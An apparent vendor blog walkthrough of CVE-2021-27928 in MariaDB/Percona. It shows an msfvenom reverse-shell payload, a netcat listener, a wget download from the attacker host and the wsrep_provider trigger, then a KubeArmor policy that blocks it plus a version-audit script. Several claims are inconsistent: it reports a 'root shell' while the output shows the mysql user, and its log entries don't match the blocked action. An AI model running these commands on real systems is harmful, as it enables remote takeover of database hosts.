Introduction

Data is a critical asset of any company, and data protection is a critical component of business protection. Having a strong database security posture will enable you to protect your organization’s sensitive information from outsiders.

Every database faces different threats; here we will look at an insider threat in which a malicious user exploits a remote code execution vulnerability in Percona PMM Server. We will first learn about the vulnerability, then walk through the exploit itself, and finally see how we can protect against it.

Vulnerability Assessment

So, let us understand the vulnerability. Remote code execution is the core issue here: an untrusted search path leads to eval injection, in which a database SUPER user can execute OS commands after modifying wsrep_provider and wsrep_notify_cmd. The affected versions are listed below.

Prerequisites:

  1. MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, or 10.5 before 10.5.9
  2. Percona Server through 2021-03-03

The specific version has already been installed on our test machine, as you can see below. [email protected] will be our victim machine.

[email protected]:~# mysql -V
mysql  Ver 15.1 Distrib 10.5.8-MariaDB, for debian-linux-gnu (x86_64) using  EditLine wrapper
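As an added vulnerability-assessment helper (not part of the original post), the script below parses the `mysql -V` banner shown above against the fixed releases listed in the prerequisites, and audits the two server variables the exploit abuses from the output of SHOW GLOBAL VARIABLES. The version table covers only the four MariaDB branches the advisory names (Percona Server is listed by date, not by version). The Galera library path in the allowlist is an assumption about where the packaged provider lives on this host, and the SHOW VARIABLES output is constructed to mirror the state the exploit leaves behind.

```python
import re
from typing import Dict, List, Optional, Tuple

# Fixed releases per affected MariaDB branch, taken from the prerequisites above.
# Percona Server is listed by date on the page, so it is not covered by this table.
FIXED_VERSIONS: Dict[Tuple[int, int], Tuple[int, int, int]] = {
    (10, 2): (10, 2, 37),
    (10, 3): (10, 3, 28),
    (10, 4): (10, 4, 18),
    (10, 5): (10, 5, 9),
}

# Values of wsrep_provider that are legitimate on this host. "none" is the server
# default; the Galera path is an assumption about where the packaged provider lives.
ALLOWED_PROVIDERS = {"none", "/usr/lib/galera/libgalera_smm.so"}

_BANNER_RE = re.compile(r"Distrib\s+(\d+)\.(\d+)\.(\d+)-MariaDB")


def parse_mariadb_version(banner: str) -> Optional[Tuple[int, int, int]]:
    """Extract (major, minor, patch) from the `mysql -V` banner, or None if absent."""
    match = _BANNER_RE.search(banner)
    if match is None:
        return None
    major, minor, patch = (int(x) for x in match.groups())
    return (major, minor, patch)


def is_affected_version(version: Tuple[int, int, int]) -> Optional[bool]:
    """True if below the fixed release of its branch, False if at or above it,
    None when the branch is not one of the four listed in the advisory."""
    fixed = FIXED_VERSIONS.get(version[:2])
    if fixed is None:
        return None
    return version < fixed


def parse_show_variables(output: str) -> Dict[str, str]:
    """Parse the tab-separated output that mysql prints for
    SHOW GLOBAL VARIABLES LIKE 'wsrep%' when stdout is not a terminal
    (a header row followed by name<TAB>value lines)."""
    variables: Dict[str, str] = {}
    for line in output.splitlines():
        if "\t" not in line:
            continue
        name, _, value = line.partition("\t")
        if name == "Variable_name":
            continue  # header row
        variables[name] = value
    return variables


def audit_wsrep(variables: Dict[str, str]) -> List[str]:
    """Flag the two variables the exploit changes: a provider library outside the
    allowlist, or any notify command at all (the server default is empty)."""
    findings: List[str] = []
    provider = variables.get("wsrep_provider", "none")
    if provider not in ALLOWED_PROVIDERS:
        findings.append(f"wsrep_provider points outside the allowlist: {provider}")
    notify_cmd = variables.get("wsrep_notify_cmd", "")
    if notify_cmd:
        findings.append(f"wsrep_notify_cmd is set: {notify_cmd}")
    return findings


# Banner copied from the victim machine above.
BANNER = "mysql  Ver 15.1 Distrib 10.5.8-MariaDB, for debian-linux-gnu (x86_64) using  EditLine wrapper"

# Constructed SHOW GLOBAL VARIABLES output mirroring the state after the exploit step.
SHOW_VARS = (
    "Variable_name\tValue\n"
    "wsrep_notify_cmd\t\n"
    "wsrep_on\tOFF\n"
    "wsrep_provider\t/tmp/CVE-2021-27928.so\n"
)

if __name__ == "__main__":
    version = parse_mariadb_version(BANNER)
    if version is not None:
        print("version:", version, "affected:", is_affected_version(version))
    for finding in audit_wsrep(parse_show_variables(SHOW_VARS)):
        print("finding:", finding)
```

Run against a live server by feeding it the banner from `mysql -V` and the output of `mysql -e "SHOW GLOBAL VARIABLES LIKE 'wsrep%'"`; a version below the branch's fixed release, or a provider path outside the allowlist, is the signal to patch or to apply a host policy such as the one below.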

The Exploit?

We will connect to another machine and then will start with the exploitation. [email protected] will be the attacker’s machine.

Step 1:

Let's create our reverse shell payload with msfvenom. For our payload we will use linux/x64/shell_reverse_tcp.

[NOTE] Change LHOST to your IP address.

[email protected]:~# msfvenom -p linux/x64/shell_reverse_tcp LHOST=172.26.255.252 LPORT=8181 -f elf-so -o CVE-2021-27928.so

Step 2:

Now we will use Netcat to listen to the specified port.

[email protected]:~# nc -lvp 8181
listening on [any] 8181 ..


Step 3:

We will copy the payload to the victim machine. Here we will be using Python's built-in HTTP server.

[email protected]:~# python3 -m http.server 8000                                    	 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/)...

Step 4:

Now let us get into the victim machine and download the payload. To do that just follow the commands below.

[email protected]:~# cd /tmp/

[email protected]:~# wget http://172.26.255.252:8000/CVE-2021-27928.so
--2022-01-19 11:42:44--  http://172.26.255.252:8000/CVE-2021-27928.so
Connecting to 172.26.255.252:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 476 [application/octet-stream]
Saving to: 'CVE-2021-27928.so.1'

CVE-2021-27928.so.1                       	100%[================================================================================================>] 	476  --.-KB/s	in 0s 	 

2022-01-19 11:42:44 (17.9 MB/s) - 'CVE-2021-27928.so.1' saved [476/476]


Step 5:

We will now execute the payload.

[email protected]:~# mysql -u root -p -h 127.0.0.1 -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'
Enter password: 
ERROR 2013 (HY000) at line 1: Lost connection to MySQL server during query


Now let us check our listener; we have successfully obtained root shell access.

[email protected]:~# nc -lvp 8181
listening on [any] 8181 ..
connect to [172.26.80.176] from kali.mshome.net [172.26.80.1] 3900

id
uid=104(mysql) gid=110(mysql) groups=110(mysql)

whoami
mysql

ls
aria_log.00000001
aria_log_control
debian-10.5.flag
ib_buffer_pool
ib_logfile0
performance_schema


Let us see how we can protect it using the KubeArmor security policy.

How to use KubeArmor on your VM

Below is a sample policy we are going to apply using KubeArmor. We also have sample policies for various other workloads, curated by security experts; check out our other Policy Templates to view them.

# KubeArmor is an open source software that enables you to protect your cloud workload at run-time.
# To learn more about KubeArmor visit:
# https://www.accuknox.com/kubearmor

apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
  name: vm-wsrep_provider-os-command-execution
spec:
  tags: ["VM", "Percona-Server", "mysql", "Mariadb", "root-shell"]
  message: "payload execution is blocked"
  file:
    severity: 2
    matchPaths:
      - path: /usr/lib/galera/libgalera_smm.so
      - path: /tmp/CVE-2021-27928.so
    matchPatterns:
      - pattern: /**/**/usr/lib/galera/libgalera_smm.so
      - pattern: /**/**/CVE-2021-27928.so
    action: Block
  process:
    severity: 2
    matchPaths:
      - path: /usr/lib/galera/libgalera_smm.so
      - path: /tmp/CVE-2021-27928.so
      - path: /usr/bin/mysql
    matchPatterns:
      - pattern: /**/**/usr/lib/galera/libgalera_smm.so
      - pattern: /**/**/CVE-2021-27928.so
    action: Block


We will save the file as vm-cve-2021-27928.yaml. To apply a VM policy just copy and paste the following command in your terminal.

[email protected]:~# karmor vm policy add vm-cve-2021-27928.yaml
Success

Once the policy is applied let us execute the payload and see what happens.

[email protected]:~# mysql -u root -p -h 127.0.0.1 -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'
Enter password: 
ERROR 1126 (HY000) at line 1: Can't open shared library '/tmp/CVE-2021-27928.so' (errno: -1807791184, wsrep_init failed)

KubeArmor denies the open of the shared object that wsrep_provider points to, so the payload never executes and no shell reaches the attacker machine.

To check for logs just copy-paste the following command in your terminal.

karmor log --json	
{
  "Timestamp": 1642659437,
  "UpdatedTime": "2022-01-20T06:17:17.447160Z",
  "ClusterName": "Default",
  "HostName": "kali",
  "HostPID": 4316,
  "PPID": 4016,
  "PID": 4316,
  "PolicyName": "vm-wsrep_provider-os-command-execution",
  "Severity": "2",
  "Tags": "VM,Percona-Server\",mysql,Mariadb,root-shell",
  "Message": "payload execution is blocked",
  "Type": "MatchedHostPolicy",
  "Source": "bash",
  "Operation": "Process",
  "Resource": "/usr/bin/mysql -u root -p -e SET GLOBAL wsrep_provider=\"/tmp/CVE-2021-27928.so\";",
  "Data": "syscall=SYS_EXECVE",
  "Action": "Block",
  "Result": "Passed"
}

Conclusion

In this blog, we have seen how a single unwanted permission on a variable in your DB's codebase could be abused to gain root access to your system. Several other exploits can also be used against you when you are running an outdated version of any database, so the solution is to always keep your DB version updated to the latest patch as soon as the vendor releases it.

KubeArmor is a cloud run-time security tool by AccuKnox that makes detecting such vulnerabilities and patching them up easier while manual updates take time. To learn more about AccuKnox and its products, check out the links below.

KubeArmor website: https://www.accuknox.com/kubearmor/

KubeArmor GitHub: https://github.com/kubearmor/KubeArmor

KubeArmor Slack: https://kubearmor.herokuapp.com/


Now you can protect your workloads in minutes using AccuKnox. It protects your Kubernetes and other cloud workloads using kernel-native primitives such as AppArmor, SELinux, and eBPF.

Let us know if you are seeking additional guidance in planning your cloud security program.
